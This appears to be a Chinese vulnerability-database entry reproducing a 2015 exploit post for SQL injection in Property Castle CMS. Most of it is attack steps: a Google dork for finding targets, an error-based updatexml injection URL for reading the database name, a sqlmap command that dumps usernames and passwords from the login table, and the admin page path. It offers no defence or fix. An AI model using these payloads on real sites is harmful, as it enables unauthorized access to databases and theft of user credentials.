Property Castle CMS post SQL injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1041161 漏洞类型
发布时间 2015-10-06 更新时间 2015-10-06
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015100050
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Property Castle CMS post SQL injection
# Google Dork: inurl:"/cms/cms.php?link_id="
# Date: 05/10/2015
# Exploit Author: Timoumi Houcem
# Tested on: kali linux on iceweasel browser
# EXPLOIT
1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)--+
we will have database name 
2- we search "contact us" page
3- we use "http header" to get data names (all post data  are injectable , i will use the first in this example)
4- we use sqlmap tool now and inject it with POST method
EXAMPLE : [ sqlmap --url "http://website/user/controller/valuation/valuation-controller.php" --data "name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php" -p name -D [database_name] -T login -C username,password --dump ]
#admin page: http://website/admin/index.php